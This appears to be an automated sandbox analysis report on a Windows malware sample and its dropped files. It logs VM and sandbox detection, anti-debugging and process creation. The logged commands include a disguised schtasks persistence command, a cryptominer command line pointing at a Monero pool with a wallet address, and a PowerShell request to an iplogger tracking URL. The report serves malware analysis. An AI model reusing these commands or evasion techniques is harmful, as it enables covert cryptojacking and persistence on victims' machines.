Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\nulhfhsi.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\nulhfhsi.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\revs.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\revs.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\nulhfhsi.exe

RDTSC instruction interceptor: First address: 0000000000C2B6D7 second address: 0000000000C2B6E3 instructions: 0x00000000 rdtsc 0x00000002 movzx edx, ax 0x00000005 bts edx, edx 0x00000008 xor bl, cl 0x0000000a rcl dl, cl 0x0000000c rdtsc

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\revs.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\evs.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\hello_C#.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Window / User API: threadDelayed 2039			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Window / User API: threadDelayed 6722			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\lxoqz3o0.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys

Jump to dropped file

Is looking for software installed on the system

Source: C:\Users\user\AppData\Local\nulhfhsi.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe TID: 6776	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe TID: 6760	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe TID: 5868	Thread sleep time: -56000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe TID: 68	Thread sleep time: -13835058055282155s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\evs.exe TID: 6376	Thread sleep count: 256 > 30
Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe TID: 5144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\hello_C#.exe TID: 5312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5200	Thread sleep count: 293 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5232	Thread sleep count: 74 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5200	Thread sleep count: 143 > 30

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\nulhfhsi.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\evs.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\evs.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Last function: Thread delayed

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\AppData\Local\Temp\evs.exe	Code function: 22_2_004062F0 FindFirstFileA,FindClose,		22_2_004062F0
Source: C:\Users\user\AppData\Local\Temp\evs.exe	Code function: 22_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		22_2_004057B5
Source: C:\Users\user\AppData\Local\Temp\evs.exe	Code function: 22_2_00402765 FindFirstFileA,		22_2_00402765
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_008B7AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		31_2_008B7AA8

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: nulhfhsi.exe, 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: nulhfhsi.exe, 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareYK1H39RCWin32_VideoControllerL119UEN9VideoController120060621000000.000000-0009.651068display.infMSBDAN6M7_V_6PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsSBCU13XE~
Source: nulhfhsi.exe, 00000004.00000003.266096274.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269731993.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295282731.0000000001840000.00000004.00000001.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: cpu.exe, 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW i(
Source: cpu.exe, 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: nulhfhsi.exe	Binary or memory string: VMWare
Source: nulhfhsi.exe, 00000004.00000003.266305328.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.270040441.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295918673.0000000001840000.00000004.00000001.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: nulhfhsi.exe, 00000004.00000003.266384514.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269413903.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295086735.0000000001840000.00000004.00000001.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
Source: nulhfhsi.exe, 00000004.00000003.266436615.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269511334.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295168811.0000000001840000.00000004.00000001.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
Source: nulhfhsi.exe, 00000004.00000003.266199641.0000000001410000.00000004.00000001.sdmp, lxoqz3o0.exe, 00000006.00000003.269927378.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, 0000000E.00000003.295820103.0000000001840000.00000004.00000001.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
Source: nulhfhsi.exe, 00000004.00000002.460328146.00000000016D6000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: nulhfhsi.exe, 00000004.00000002.503459155.0000000006A56000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy
Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: lxoqz3o0.exe, 00000006.00000003.295501465.0000000000DC4000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll))

Queries a list of all running drivers

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe

System information queried: ModuleInformation

Jump to behavior

Queries a list of all running processes

Source: C:\Users\user\AppData\Local\nulhfhsi.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\revs.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Process queried: DebugObjectHandle			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Process queried: DebugObjectHandle			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Process queried: DebugObjectHandle			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Process queried: DebugObjectHandle			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Process queried: DebugObjectHandle

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_004261F0 IsDebuggerPresent,DebuggerProbe,

31_2_004261F0

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_004111C0 InterlockedIncrement,__itow_s,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcscpy_s,_wcscpy_s,_wcscat_s,_wcscat_s,_wcscat_s,__snwprintf_s,_wcscpy_s,_wcscpy_s,__cftoe,__lock,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__itow_s,

31_2_004111C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_00412560 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

31_2_00412560

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00850D90 mov eax, dword ptr fs:[00000030h]		31_2_00850D90
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_0085092B mov eax, dword ptr fs:[00000030h]		31_2_0085092B
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00AB18BB push dword ptr fs:[00000030h]		31_2_00AB18BB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_00427790 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,__get_osfhandle,SetEndOfFile,GetLastError,__lseeki64_nolock,

31_2_00427790

Enables debug privileges

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Contains functionality to register its own exception handler

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_00412D20 SetUnhandledExceptionFilter,

31_2_00412D20

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Process created: C:\Users\user\AppData\Local\nulhfhsi.exe 'C:\Users\user\AppData\Local\nulhfhsi.exe'			Jump to behavior
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Process created: C:\Users\user\AppData\Local\lxoqz3o0.exe 'C:\Users\user\AppData\Local\lxoqz3o0.exe'			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Process created: C:\Users\user\AppData\Local\Temp\evs.exe 'C:\Users\user\AppData\Local\Temp\evs.exe'			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Process created: C:\Users\user\AppData\Local\Temp\revs.exe 'C:\Users\user\AppData\Local\Temp\revs.exe'			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\evs.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe 'hello_C# (2).exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\hello_C#.exe 'hello_C#.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\jo.exe 'jo.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'

May try to detect the Windows Explorer process (often used for injection)

Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: cpu.exe, 00000010.00000002.499104132.000002AB80000000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.504440633.000002479EE50000.00000002.00000001.sdmp, evs.exe, 00000016.00000002.508839217.00000000010B0000.00000002.00000001.sdmp, jo.exe, 0000001F.00000002.508778864.0000000001D30000.00000002.00000001.sdmp	Binary or memory string: Progman
